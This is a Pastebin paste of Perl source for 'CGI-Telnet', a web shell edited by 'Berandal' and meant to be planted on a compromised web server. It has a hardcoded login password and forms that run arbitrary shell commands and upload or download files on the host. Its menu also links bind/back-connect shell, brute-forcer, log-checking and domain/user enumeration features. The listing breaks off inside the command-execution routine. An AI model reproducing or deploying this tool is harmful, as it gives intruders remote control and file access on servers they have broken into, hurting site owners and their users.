daily pastebin goal
75%
SHARE
TWEET

CGI Telnet

Berandal666 Jan 10th, 2018 394 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/perl -I/usr/local/bandmin
  2. use MIME::Base64;
  3. $Version= "CGI-Telnet Version 1.3";
  4. $EditPersion="<font style='text-shadow: 0px 0px 6px rgb(255, 0, 0), 0px 0px 5px rgb(300, 0, 0), 0px 0px 5px rgb(300, 0, 0); color:#ffffff; font-weight:bold;'>Berandal - CGI-Telnet</font>";
  5.  
  6. $Password = "berandal666";          # Change this. You will need to enter this to login.
  7. sub Is_Win(){
  8.     $os = &trim($ENV{"SERVER_SOFTWARE"});
  9.     if($os =~ m/win/i){
  10.         return 1;
  11.     }
  12.     else{
  13.         return 0;
  14.     }
  15. }
  16. $WinNT = &Is_Win();             # You need to change the value of this to 1 if
  17.                                 # you're running this script on a Windows NT
  18.                                 # machine. If you're running it on Unix, you
  19.                                 # can leave the value as it is.
  20.  
  21. $NTCmdSep = "&";                # This character is used to seperate 2 commands
  22.                                 # in a command line on Windows NT.
  23.  
  24. $UnixCmdSep = ";";              # This character is used to seperate 2 commands
  25.                                 # in a command line on Unix.
  26.  
  27. $CommandTimeoutDuration = 10000;    # Time in seconds after commands will be killed
  28.                                 # Don't set this to a very large value. This is
  29.                                 # useful for commands that may hang or that
  30.                                 # take very long to execute, like "find /".
  31.                                 # This is valid only on Unix servers. It is
  32.                                 # ignored on NT Servers.
  33.  
  34. $ShowDynamicOutput = 1;         # If this is 1, then data is sent to the
  35.                                 # browser as soon as it is output, otherwise
  36.                                 # it is buffered and send when the command
  37.                                 # completes. This is useful for commands like
  38.                                 # ping, so that you can see the output as it
  39.                                 # is being generated.
  40.  
  41. # DON'T CHANGE ANYTHING BELOW THIS LINE UNLESS YOU KNOW WHAT YOU'RE DOING !!
  42.  
  43. $CmdSep = ($WinNT ? $NTCmdSep : $UnixCmdSep);
  44. $CmdPwd = ($WinNT ? "cd" : "pwd");
  45. $PathSep = ($WinNT ? "\\" : "/");
  46. $Redirector = ($WinNT ? " 2>&1 1>&2" : " 1>&1 2>&1");
  47. $cols= 150;
  48. $rows= 26;
  49. #------------------------------------------------------------------------------
  50. # Reads the input sent by the browser and parses the input variables. It
  51. # parses GET, POST and multipart/form-data that is used for uploading files.
  52. # The filename is stored in $in{'f'} and the data is stored in $in{'filedata'}.
  53. # Other variables can be accessed using $in{'var'}, where var is the name of
  54. # the variable. Note: Most of the code in this function is taken from other CGI
  55. # scripts.
  56. #------------------------------------------------------------------------------
  57. sub ReadParse
  58. {
  59.     local (*in) = @_ if @_;
  60.     local ($i, $loc, $key, $val);
  61.    
  62.     $MultipartFormData = $ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/;
  63.  
  64.     if($ENV{'REQUEST_METHOD'} eq "GET")
  65.     {
  66.         $in = $ENV{'QUERY_STRING'};
  67.     }
  68.     elsif($ENV{'REQUEST_METHOD'} eq "POST")
  69.     {
  70.         binmode(STDIN) if $MultipartFormData & $WinNT;
  71.         read(STDIN, $in, $ENV{'CONTENT_LENGTH'});
  72.     }
  73.  
  74.     # handle file upload data
  75.     if($ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/)
  76.     {
  77.         $Boundary = '--'.$1; # please refer to RFC1867
  78.         @list = split(/$Boundary/, $in);
  79.         $HeaderBody = $list[1];
  80.         $HeaderBody =~ /\r\n\r\n|\n\n/;
  81.         $Header = $`;
  82.         $Body = $';
  83.         $Body =~ s/\r\n$//; # the last \r\n was put in by Netscape
  84.         $in{'filedata'} = $Body;
  85.         $Header =~ /filename=\"(.+)\"/;
  86.         $in{'f'} = $1;
  87.         $in{'f'} =~ s/\"//g;
  88.         $in{'f'} =~ s/\s//g;
  89.  
  90.         # parse trailer
  91.         for($i=2; $list[$i]; $i++)
  92.         {
  93.             $list[$i] =~ s/^.+name=$//;
  94.             $list[$i] =~ /\"(\w+)\"/;
  95.             $key = $1;
  96.             $val = $';
  97.             $val =~ s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g;
  98.             $val =~ s/%(..)/pack("c", hex($1))/ge;
  99.             $in{$key} = $val;
  100.         }
  101.     }
  102.     else # standard post data (url encoded, not multipart)
  103.     {
  104.         @in = split(/&/, $in);
  105.         foreach $i (0 .. $#in)
  106.         {
  107.             $in[$i] =~ s/\+/ /g;
  108.             ($key, $val) = split(/=/, $in[$i], 2);
  109.             $key =~ s/%(..)/pack("c", hex($1))/ge;
  110.             $val =~ s/%(..)/pack("c", hex($1))/ge;
  111.             $in{$key} .= "\0" if (defined($in{$key}));
  112.             $in{$key} .= $val;
  113.         }
  114.     }
  115. }
  116.  
  117. #------------------------------------------------------------------------------
  118. # Prints the HTML Page Header
  119. # Argument 1: Form item name to which focus should be set
  120. #------------------------------------------------------------------------------
  121. sub PrintPageHeader
  122. {
  123.     $EncodedCurrentDir = $CurrentDir;
  124.     $EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
  125.     my $dir =$CurrentDir;
  126.     $dir=~ s/\\/\\\\/g;
  127.     print "Content-type: text/html\n\n";
  128.     print <<END;
  129. <html>
  130. <head>
  131. <meta http-equiv="content-type" content="text/html; charset=UTF-8">
  132. <title>iBerandal!</title>
  133.  
  134. $HtmlMetaHeader
  135.  
  136. </head>
  137. <style>
  138. body{
  139. font: 10pt Verdana;
  140. }
  141. tr {
  142. BORDER-RIGHT:  #3e3e3e 1px solid;
  143. BORDER-TOP:    #3e3e3e 1px solid;
  144. BORDER-LEFT:   #3e3e3e 1px solid;
  145. BORDER-BOTTOM: #3e3e3e 1px solid;
  146. color: #ff9900;
  147. }
  148. td {
  149. BORDER-RIGHT:  #3e3e3e 1px solid;
  150. BORDER-TOP:    #3e3e3e 1px solid;
  151. BORDER-LEFT:   #3e3e3e 1px solid;
  152. BORDER-BOTTOM: #3e3e3e 1px solid;
  153. color: #2BA8EC;
  154. font: 10pt Verdana;
  155. }
  156.  
  157. table {
  158. BORDER-RIGHT:  #3e3e3e 1px solid;
  159. BORDER-TOP:    #3e3e3e 1px solid;
  160. BORDER-LEFT:   #3e3e3e 1px solid;
  161. BORDER-BOTTOM: #3e3e3e 1px solid;
  162. BACKGROUND-COLOR: #111;
  163. }
  164.  
  165.  
  166. input {
  167. BORDER-RIGHT:  #3e3e3e 1px solid;
  168. BORDER-TOP:    #3e3e3e 1px solid;
  169. BORDER-LEFT:   #3e3e3e 1px solid;
  170. BORDER-BOTTOM: #3e3e3e 1px solid;
  171. BACKGROUND-COLOR: Black;
  172. font: 10pt Verdana;
  173. color: #ff9900;
  174. }
  175.  
  176. input.submit {
  177. text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;
  178. color: #FFFFFF;
  179. border-color: #009900;
  180. }
  181.  
  182. code {
  183. border          : dashed 0px #333;
  184. BACKGROUND-COLOR: Black;
  185. font: 10pt Verdana bold;
  186. color: while;
  187. }
  188.  
  189. run {
  190. border          : dashed 0px #333;
  191. font: 10pt Verdana bold;
  192. color: #FF00AA;
  193. }
  194.  
  195. textarea {
  196. BORDER-RIGHT:  #3e3e3e 1px solid;
  197. BORDER-TOP:    #3e3e3e 1px solid;
  198. BORDER-LEFT:   #3e3e3e 1px solid;
  199. BORDER-BOTTOM: #3e3e3e 1px solid;
  200. BACKGROUND-COLOR: #1b1b1b;
  201. font: Fixedsys bold;
  202. color: #aaa;
  203. }
  204. A:link {
  205.     COLOR: #2BA8EC; TEXT-DECORATION: none
  206. }
  207. A:visited {
  208.     COLOR: #2BA8EC; TEXT-DECORATION: none
  209. }
  210. A:hover {
  211.     text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;
  212.     color: #ff9900; TEXT-DECORATION: none
  213. }
  214. A:active {
  215.     color: Red; TEXT-DECORATION: none
  216. }
  217.  
  218. .listdir tr:hover{
  219.     background: #444;
  220. }
  221. .listdir tr:hover td{
  222.     background: #444;
  223.     text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;
  224.     color: #FFFFFF; TEXT-DECORATION: none;
  225. }
  226. .notline{
  227.     background: #111;
  228. }
  229. .line{
  230.     background: #222;
  231. }
  232. </style>
  233. <script language="javascript">
  234. function chmod_form(i,file)
  235. {
  236.     /*var ajax='ajax_PostData("FormPerms_'+i+'","$ScriptLocation","ResponseData"); return false;';*/
  237.     var ajax="";
  238.     document.getElementById("FilePerms_"+i).innerHTML="<form name=FormPerms_" + i+ " action=' method='POST'><input id=text_" + i + "  name=chmod type=text size=5 /><input type=submit class='submit' onclick='" + ajax + "' value=OK><input type=hidden name=a value='gui'><input type=hidden name=d value='$dir'><input type=hidden name=f value='"+file+"'></form>";
  239.     document.getElementById("text_" + i).focus();
  240. }
  241. function rm_chmod_form(response,i,perms,file)
  242. {
  243.     response.innerHTML = "<span onclick=\\\"chmod_form(" + i + ",'"+ file+ "')\\\" >"+ perms +"</span></td>";
  244. }
  245. function rename_form(i,file,f)
  246. {
  247.     var ajax="";
  248.     f.replace(/\\\\/g,"\\\\\\\\");
  249.     var back="rm_rename_form("+i+",\\\""+file+"\\\",\\\""+f+"\\\"); return false;";
  250.     document.getElementById("File_"+i).innerHTML="<form name=FormPerms_" + i+ " action=' method='POST'><input id=text_" + i + "  name=rename type=text value= '"+file+"' /><input type=submit class='submit' onclick='" + ajax + "' value=OK><input type=submit class='submit' onclick='" + back + "' value=Cancel><input type=hidden name=a value='gui'><input type=hidden name=d value='$dir'><input type=hidden name=f value='"+file+"'></form>";
  251.     document.getElementById("text_" + i).focus();
  252. }
  253. function rm_rename_form(i,file,f)
  254. {
  255.     if(f=='f')
  256.     {
  257.         document.getElementById("File_"+i).innerHTML="<a href='?a=command&d=$dir&c=edit%20"+file+"%20'>" +file+ "</a>";
  258.     }else
  259.     {
  260.         document.getElementById("File_"+i).innerHTML="<a href='?a=gui&d="+f+"'>[ " +file+ " ]</a>";
  261.     }
  262. }
  263. </script>
  264. <body onLoad="document.f.@_.focus()" bgcolor="#0c0c0c" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0">
  265. <center><code>
  266. <table border="1" width="100%" cellspacing="0" cellpadding="2">
  267. <tr>
  268.     <td align="center" rowspan=2>
  269.         <b><font size="5">$EditPersion</font></b>
  270.     </td>
  271.  
  272.     <td>
  273.  
  274.         <font face="Verdana" size="2">$ENV{"SERVER_SOFTWARE"}</font>
  275.     </td>
  276.     <td>Server IP:<font color="#bb0000"> $ENV{'SERVER_ADDR'}</font> | Your IP: <font color="#bb0000">$ENV{'REMOTE_ADDR'}</font>
  277.     </td>
  278.  
  279. </tr>
  280.  
  281. <tr>
  282. <td colspan="3"><font face="Verdana" size="2">
  283. <a href="$ScriptLocation">Home</a> |
  284. <a href="$ScriptLocation?a=command&d=$EncodedCurrentDir">Command</a> |
  285. <a href="$ScriptLocation?a=gui&d=$EncodedCurrentDir">GUI</a> |
  286. <a href="$ScriptLocation?a=upload&d=$EncodedCurrentDir">Upload File</a> |
  287. <a href="$ScriptLocation?a=download&d=$EncodedCurrentDir">Download File</a> |
  288.  
  289. <a href="$ScriptLocation?a=backbind">Back & Bind</a> |
  290. <a href="$ScriptLocation?a=bruteforcer">Brute Forcer</a> |
  291. <a href="$ScriptLocation?a=checklog">Check Log</a> |
  292. <a href="$ScriptLocation?a=domainsuser">Domains/Users</a> |
  293. <a href="$ScriptLocation?a=logout">Logout</a> |
  294. <a target='_blank' href="#">Help</a>
  295.  
  296. </font></td>
  297. </tr>
  298. </table>
  299. <font id="ResponseData" color="#ff99cc" >
  300. END
  301. }
  302.  
  303. #------------------------------------------------------------------------------
  304. # Prints the Login Screen
  305. #------------------------------------------------------------------------------
  306. sub PrintLoginScreen
  307. {
  308.  
  309.     print <<END;
  310. <pre><script type="text/javascript">
  311. TypingText = function(element, interval, cursor, finishedCallback) {
  312.   if((typeof document.getElementById == "undefined") || (typeof element.innerHTML == "undefined")) {
  313.     this.running = true;    // Never run.
  314.     return;
  315.   }
  316.   this.element = element;
  317.   this.finishedCallback = (finishedCallback ? finishedCallback : function() { return; });
  318.   this.interval = (typeof interval == "undefined" ? 100 : interval);
  319.   this.origText = this.element.innerHTML;
  320.   this.unparsedOrigText = this.origText;
  321.   this.cursor = (cursor ? cursor : "");
  322.   this.currentText = "";
  323.   this.currentChar = 0;
  324.   this.element.typingText = this;
  325.   if(this.element.id == "") this.element.id = "typingtext" + TypingText.currentIndex++;
  326.   TypingText.all.push(this);
  327.   this.running = false;
  328.   this.inTag = false;
  329.   this.tagBuffer = "";
  330.   this.inHTMLEntity = false;
  331.   this.HTMLEntityBuffer = "";
  332. }
  333. TypingText.all = new Array();
  334. TypingText.currentIndex = 0;
  335. TypingText.runAll = function() {
  336.   for(var i = 0; i < TypingText.all.length; i++) TypingText.all[i].run();
  337. }
  338. TypingText.prototype.run = function() {
  339.   if(this.running) return;
  340.   if(typeof this.origText == "undefined") {
  341.     setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval);   // We haven't finished loading yet.  Have patience.
  342.     return;
  343.   }
  344.   if(this.currentText == "") this.element.innerHTML = "";
  345. //  this.origText = this.origText.replace(/<([^<])*>/, "");     // Strip HTML from text.
  346.   if(this.currentChar < this.origText.length) {
  347.     if(this.origText.charAt(this.currentChar) == "<" && !this.inTag) {
  348.       this.tagBuffer = "<";
  349.       this.inTag = true;
  350.       this.currentChar++;
  351.       this.run();
  352.       return;
  353.     } else if(this.origText.charAt(this.currentChar) == ">" && this.inTag) {
  354.       this.tagBuffer += ">";
  355.       this.inTag = false;
  356.       this.currentText += this.tagBuffer;
  357.       this.currentChar++;
  358.       this.run();
  359.       return;
  360.     } else if(this.inTag) {
  361.       this.tagBuffer += this.origText.charAt(this.currentChar);
  362.       this.currentChar++;
  363.       this.run();
  364.       return;
  365.     } else if(this.origText.charAt(this.currentChar) == "&" && !this.inHTMLEntity) {
  366.       this.HTMLEntityBuffer = "&";
  367.       this.inHTMLEntity = true;
  368.       this.currentChar++;
  369.       this.run();
  370.       return;
  371.     } else if(this.origText.charAt(this.currentChar) == ";" && this.inHTMLEntity) {
  372.       this.HTMLEntityBuffer += ";";
  373.       this.inHTMLEntity = false;
  374.       this.currentText += this.HTMLEntityBuffer;
  375.       this.currentChar++;
  376.       this.run();
  377.       return;
  378.     } else if(this.inHTMLEntity) {
  379.       this.HTMLEntityBuffer += this.origText.charAt(this.currentChar);
  380.       this.currentChar++;
  381.       this.run();
  382.       return;
  383.     } else {
  384.       this.currentText += this.origText.charAt(this.currentChar);
  385.     }
  386.     this.element.innerHTML = this.currentText;
  387.     this.element.innerHTML += (this.currentChar < this.origText.length - 1 ? (typeof this.cursor == "function" ? this.cursor(this.currentText) : this.cursor) : "");
  388.     this.currentChar++;
  389.     setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval);
  390.   } else {
  391.     this.currentText = "";
  392.     this.currentChar = 0;
  393.         this.running = false;
  394.         this.finishedCallback();
  395.   }
  396. }
  397. </script>
  398. </pre>
  399.  
  400. <font style="font: 15pt Verdana; color: yellow;">Copyright (C) 2001 Rohitab Batra </font><br><br>
  401. <table align="center" border="1" width="600" heigh>
  402. <tbody><tr>
  403. <td valign="top" background="http://dl.dropbox.com/u/10860051/images/matran.gif"><p id="hack" style="margin-left: 3px;">
  404. <font color="#009900"> Please Wait . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .</font> <br>
  405.  
  406. <font color="#009900"> Trying connect to Server . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .</font><br>
  407. <font color="#F00000"><font color="#FFF000">~\$</font> Connected ! </font><br>
  408. <font color="#009900"><font color="#FFF000">$ServerName~</font> Checking Server . . . . . . . . . . . . . . . . . . .</font> <br>
  409.  
  410. <font color="#009900"><font color="#FFF000">$ServerName~</font> Trying connect to Command . . . . . . . . . . .</font><br>
  411.  
  412. <font color="#F00000"><font color="#FFF000">$ServerName~</font>\$ Connected Command! </font><br>
  413. <font color="#009900"><font color="#FFF000">$ServerName~<font color="#F00000">\$</font></font> OK! You can kill it!</font>
  414. </tr>
  415. </tbody></table>
  416. <br>
  417.  
  418. <script type="text/javascript">
  419. new TypingText(document.getElementById("hack"), 30, function(i){ var ar = new Array("_",""); return " " + ar[i.length % ar.length]; });
  420. TypingText.runAll();
  421.  
  422. </script>
  423. END
  424. }
  425.  
  426. #------------------------------------------------------------------------------
  427. # Add html special chars
  428. #------------------------------------------------------------------------------
  429. sub HtmlSpecialChars($){
  430.     my $text = shift;
  431.     $text =~ s/&/&amp;/g;
  432.     $text =~ s/"/&quot;/g;
  433.     $text =~ s/'/&#039;/g;
  434.     $text =~ s/</&lt;/g;
  435.     $text =~ s/>/&gt;/g;
  436.     return $text;
  437. }
  438. #------------------------------------------------------------------------------
  439. # Add link for directory
  440. #------------------------------------------------------------------------------
  441. sub AddLinkDir($)
  442. {
  443.     my $ac=shift;
  444.     my @dir=();
  445.     if($WinNT)
  446.     {
  447.         @dir=split(/\\/,$CurrentDir);
  448.     }else
  449.     {
  450.         @dir=split("/",&trim($CurrentDir));
  451.     }
  452.     my $path="";
  453.     my $result="";
  454.     foreach (@dir)
  455.     {
  456.         $path .= $_.$PathSep;
  457.         $result.="<a href='?a=".$ac."&d=".$path."'>".$_.$PathSep."</a>";
  458.     }
  459.     return $result;
  460. }
  461. #------------------------------------------------------------------------------
  462. # Prints the message that informs the user of a failed login
  463. #------------------------------------------------------------------------------
  464. sub PrintLoginFailedMessage
  465. {
  466.     print <<END;
  467. <br>Login : Administrator<br>
  468.  
  469. Password:<br>
  470. Login incorrect<br><br>
  471. END
  472. }
  473.  
  474. #------------------------------------------------------------------------------
  475. # Prints the HTML form for logging in
  476. #------------------------------------------------------------------------------
  477. sub PrintLoginForm
  478. {
  479.     print <<END;
  480. <form name="f" method="POST" action="$ScriptLocation">
  481. <input type="hidden" name="a" value="login">
  482. Login : Administrator<br>
  483. Password:<input type="password" name="p">
  484. <input class="submit" type="submit" value="Enter">
  485. </form>
  486. END
  487. }
  488.  
  489. #------------------------------------------------------------------------------
  490. # Prints the footer for the HTML Page
  491. #------------------------------------------------------------------------------
  492. sub PrintPageFooter
  493. {
  494.     print "<br><font color=red>o---[  <font color=#ff9900>Edit by $EditPersion </font>  ]---o</font></code></center></body></html>";
  495. }
  496.  
  497. #------------------------------------------------------------------------------
  498. # Retreives the values of all cookies. The cookies can be accesses using the
  499. # variable $Cookies{'}
  500. #------------------------------------------------------------------------------
  501. sub GetCookies
  502. {
  503.     @httpcookies = split(/; /,$ENV{'HTTP_COOKIE'});
  504.     foreach $cookie(@httpcookies)
  505.     {
  506.         ($id, $val) = split(/=/, $cookie);
  507.         $Cookies{$id} = $val;
  508.     }
  509. }
  510.  
  511. #------------------------------------------------------------------------------
  512. # Prints the screen when the user logs out
  513. #------------------------------------------------------------------------------
  514. sub PrintLogoutScreen
  515. {
  516.     print "Connection closed by foreign host.<br><br>";
  517. }
  518.  
  519. #------------------------------------------------------------------------------
  520. # Logs out the user and allows the user to login again
  521. #------------------------------------------------------------------------------
  522. sub PerformLogout
  523. {
  524.     print "Set-Cookie: SAVEDPWD=;\n"; # remove password cookie
  525.     &PrintPageHeader("p");
  526.     &PrintLogoutScreen;
  527.  
  528.     &PrintLoginScreen;
  529.     &PrintLoginForm;
  530.     &PrintPageFooter;
  531.     exit;
  532. }
  533.  
  534. #------------------------------------------------------------------------------
  535. # This function is called to login the user. If the password matches, it
  536. # displays a page that allows the user to run commands. If the password doens't
  537. # match or if no password is entered, it displays a form that allows the user
  538. # to login
  539. #------------------------------------------------------------------------------
  540. sub PerformLogin
  541. {
  542.     if($LoginPassword eq $Password) # password matched
  543.     {
  544.         print "Set-Cookie: SAVEDPWD=$LoginPassword;\n";
  545.         &PrintPageHeader;
  546.         print &ListDir;
  547.     }
  548.     else # password didn't match
  549.     {
  550.         &PrintPageHeader("p");
  551.         &PrintLoginScreen;
  552.         if($LoginPassword ne "") # some password was entered
  553.         {
  554.             &PrintLoginFailedMessage;
  555.  
  556.         }
  557.         &PrintLoginForm;
  558.         &PrintPageFooter;
  559.         exit;
  560.     }
  561. }
  562.  
  563. #------------------------------------------------------------------------------
  564. # Prints the HTML form that allows the user to enter commands
  565. #------------------------------------------------------------------------------
  566. sub PrintCommandLineInputForm
  567. {
  568.     my $dir= "<span style='font: 11pt Verdana; font-weight: bold;'>".&AddLinkDir("command")."</span>";
  569.     $Prompt = $WinNT ? "$dir > " : "<font color='#66ff66'>[admin\@$ServerName $dir]\$</font> ";
  570.     return <<END;
  571. <form name="f" method="POST" action="$ScriptLocation">
  572.  
  573. <input type="hidden" name="a" value="command">
  574.  
  575. <input type="hidden" name="d" value="$CurrentDir">
  576. $Prompt
  577. <input type="text" size="50" name="c">
  578. <input class="submit"type="submit" value="Enter">
  579. </form>
  580. END
  581. }
  582.  
  583. #------------------------------------------------------------------------------
  584. # Prints the HTML form that allows the user to download files
  585. #------------------------------------------------------------------------------
  586. sub PrintFileDownloadForm
  587. {
  588.     my $dir = &AddLinkDir("download");
  589.     $Prompt = $WinNT ? "$dir > " : "[admin\@$ServerName $dir]\$ ";
  590.     return <<END;
  591. <form name="f" method="POST" action="$ScriptLocation">
  592. <input type="hidden" name="d" value="$CurrentDir">
  593. <input type="hidden" name="a" value="download">
  594. $Prompt download<br><br>
  595. Filename: <input class="file" type="text" name="f" size="35"><br><br>
  596. Download: <input class="submit" type="submit" value="Begin">
  597.  
  598. </form>
  599. END
  600. }
  601.  
  602. #------------------------------------------------------------------------------
  603. # Prints the HTML form that allows the user to upload files
  604. #------------------------------------------------------------------------------
  605. sub PrintFileUploadForm
  606. {
  607.     my $dir= &AddLinkDir("upload");
  608.     $Prompt = $WinNT ? "$dir > " : "[admin\@$ServerName $dir]\$ ";
  609.     return <<END;
  610. <form name="f" enctype="multipart/form-data" method="POST" action="$ScriptLocation">
  611. $Prompt upload<br><br>
  612. Filename: <input class="file" type="file" name="f" size="35"><br><br>
  613. Options: &nbsp;<input type="checkbox" name="o" id="up" value="overwrite">
  614. <label for="up">Overwrite if it Exists</label><br><br>
  615. Upload:&nbsp;&nbsp;&nbsp;<input class="submit" type="submit" value="Begin">
  616. <input type="hidden" name="d" value="$CurrentDir">
  617. <input class="submit" type="hidden" name="a" value="upload">
  618.  
  619. </form>
  620.  
  621. END
  622. }
  623.  
  624. #------------------------------------------------------------------------------
  625. # This function is called when the timeout for a command expires. We need to
  626. # terminate the script immediately. This function is valid only on Unix. It is
  627. # never called when the script is running on NT.
  628. #------------------------------------------------------------------------------
  629. sub CommandTimeout
  630. {
  631.     if(!$WinNT)
  632.     {
  633.         alarm(0);
  634.         return <<END;
  635. </textarea>
  636. <br><font color=yellow>
  637. Command exceeded maximum time of $CommandTimeoutDuration second(s).</font>
  638. <br><font size='6' color=red>Killed it!</font>
  639. END
  640.     }
  641. }
  642.  
  643.  
  644.  
  645. #------------------------------------------------------------------------------
  646. # This function displays the page that contains a link which allows the user
  647. # to download the specified file. The page also contains a auto-refresh
  648. # feature that starts the download automatically.
  649. # Argument 1: Fully qualified filename of the file to be downloaded
  650. #------------------------------------------------------------------------------
  651. sub PrintDownloadLinkPage
  652. {
  653.     local($FileUrl) = @_;
  654.     my $result="";
  655.     if(-e $FileUrl) # if the file exists
  656.     {
  657.         # encode the file link so we can send it to the browser
  658.         $FileUrl =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
  659.         $DownloadLink = "$ScriptLocation?a=download&f=$FileUrl&o=go";
  660.         $HtmlMetaHeader = "<meta HTTP-EQUIV=\"Refresh\" CONTENT=\"1; URL=$DownloadLink\">";
  661.         &PrintPageHeader("c");
  662.         $result .= <<END;
  663. Sending File $TransferFile...<br>
  664.  
  665. If the download does not start automatically,
  666. <a href="$DownloadLink">Click Here</a>
  667. END
  668.         $result .= &PrintCommandLineInputForm;
  669.     }
  670.     else # file doesn't exist
  671.     {
  672.         $result .= "Failed to download $FileUrl: $!";
  673.         $result .= &PrintFileDownloadForm;
  674.     }
  675.     return $result;
  676. }
  677.  
  678. #------------------------------------------------------------------------------
  679. # This function reads the specified file from the disk and sends it to the
  680. # browser, so that it can be downloaded by the user.
  681. # Argument 1: Fully qualified pathname of the file to be sent.
  682. #------------------------------------------------------------------------------
  683. sub SendFileToBrowser
  684. {
  685.     my $result = "";
  686.     local($SendFile) = @_;
  687.     if(open(SENDFILE, $SendFile)) # file opened for reading
  688.     {
  689.         if($WinNT)
  690.         {
  691.             binmode(SENDFILE);
  692.             binmode(STDOUT);
  693.         }
  694.         $FileSize = (stat($SendFile))[7];
  695.         ($Filename = $SendFile) =~  m!([^/^\\]*)$!;
  696.         print "Content-Type: application/x-unknown\n";
  697.         print "Content-Length: $FileSize\n";
  698.         print "Content-Disposition: attachment; filename=$1\n\n";
  699.         print while(<SENDFILE>);
  700.         close(SENDFILE);
  701.         exit(1);
  702.     }
  703.     else # failed to open file
  704.     {
  705.         $result .= "Failed to download $SendFile: $!";
  706.         $result .=&PrintFileDownloadForm;
  707.     }
  708.     return $result;
  709. }
  710.  
  711.  
  712. #------------------------------------------------------------------------------
  713. # This function is called when the user downloads a file. It displays a message
  714. # to the user and provides a link through which the file can be downloaded.
  715. # This function is also called when the user clicks on that link. In this case,
  716. # the file is read and sent to the browser.
  717. #------------------------------------------------------------------------------
  718. sub BeginDownload
  719. {
  720.     # get fully qualified path of the file to be downloaded
  721.     if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
  722.         (!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
  723.     {
  724.         $TargetFile = $TransferFile;
  725.     }
  726.     else # path is relative
  727.     {
  728.         chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
  729.         $TargetFile .= $PathSep.$TransferFile;
  730.     }
  731.  
  732.     if($Options eq "go") # we have to send the file
  733.     {
  734.         &SendFileToBrowser($TargetFile);
  735.     }
  736.     else # we have to send only the link page
  737.     {
  738.         &PrintDownloadLinkPage($TargetFile);
  739.     }
  740. }
  741.  
  742. #------------------------------------------------------------------------------
  743. # This function is called when the user wants to upload a file. If the
  744. # file is not specified, it displays a form allowing the user to specify a
  745. # file, otherwise it starts the upload process.
  746. #------------------------------------------------------------------------------
  747. sub UploadFile
  748. {
  749.     # if no file is specified, print the upload form again
  750.     if($TransferFile eq "")
  751.     {
  752.         return &PrintFileUploadForm;
  753.  
  754.     }
  755.     my $result="";
  756.     # start the uploading process
  757.     $result .= "Uploading $TransferFile to $CurrentDir...<br>";
  758.  
  759.     # get the fullly qualified pathname of the file to be created
  760.     chop($TargetName) if ($TargetName = $CurrentDir) =~ m/[\\\/]$/;
  761.     $TransferFile =~ m!([^/^\\]*)$!;
  762.     $TargetName .= $PathSep.$1;
  763.  
  764.     $TargetFileSize = length($in{'filedata'});
  765.     # if the file exists and we are not supposed to overwrite it
  766.     if(-e $TargetName && $Options ne "overwrite")
  767.     {
  768.         $result .= "Failed: Destination file already exists.<br>";
  769.     }
  770.     else # file is not present
  771.     {
  772.         if(open(UPLOADFILE, ">$TargetName"))
  773.         {
  774.             binmode(UPLOADFILE) if $WinNT;
  775.             print UPLOADFILE $in{'filedata'};
  776.             close(UPLOADFILE);
  777.             $result .= "Transfered $TargetFileSize Bytes.<br>";
  778.             $result .= "File Path: $TargetName<br>";
  779.         }
  780.         else
  781.         {
  782.             $result .= "Failed: $!<br>";
  783.         }
  784.     }
  785.     $result .= &PrintCommandLineInputForm;
  786.     return $result;
  787. }
  788.  
  789. #------------------------------------------------------------------------------
  790. # This function is called when the user wants to download a file. If the
  791. # filename is not specified, it displays a form allowing the user to specify a
  792. # file, otherwise it displays a message to the user and provides a link
  793. # through  which the file can be downloaded.
  794. #------------------------------------------------------------------------------
  795. sub DownloadFile
  796. {
  797.     # if no file is specified, print the download form again
  798.     if($TransferFile eq "")
  799.     {
  800.         &PrintPageHeader("f");
  801.         return &PrintFileDownloadForm;
  802.     }
  803.    
  804.     # get fully qualified path of the file to be downloaded
  805.     if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) | (!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
  806.     {
  807.         $TargetFile = $TransferFile;
  808.     }
  809.     else # path is relative
  810.     {
  811.         chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
  812.         $TargetFile .= $PathSep.$TransferFile;
  813.     }
  814.  
  815.     if($Options eq "go") # we have to send the file
  816.     {
  817.         return &SendFileToBrowser($TargetFile);
  818.     }
  819.     else # we have to send only the link page
  820.     {
  821.         return &PrintDownloadLinkPage($TargetFile);
  822.     }
  823. }
  824.  
  825.  
  826. #------------------------------------------------------------------------------
  827. # This function is called to execute commands. It displays the output of the
  828. # command and allows the user to enter another command. The change directory
  829. # command is handled differently. In this case, the new directory is stored in
  830. # an internal variable and is used each time a command has to be executed. The
  831. # output of the change directory command is not displayed to the users
  832. # therefore error messages cannot be displayed.
  833. #------------------------------------------------------------------------------
  834. sub ExecuteCommand
  835. {
  836.     my $result="";
  837.     if($RunCommand =~ m/^\s*cd\s+(.+)/) # it is a change dir command
  838.     {
  839.         # we change the directory internally. The output of the
  840.         # command is not displayed.
  841.         $Command = "cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;
  842.         chop($CurrentDir = `$Command`);
  843.         $result .= &PrintCommandLineInputForm;
  844.  
  845.         $result .= "Command: <run>$RunCommand </run><br><textarea cols='$cols' rows='$rows' spellcheck='false'>";
  846.         # xuat thong tin khi chuyen den 1 thu muc nao do!
  847.         $RunCommand= $WinNT?"dir":"dir -lia";
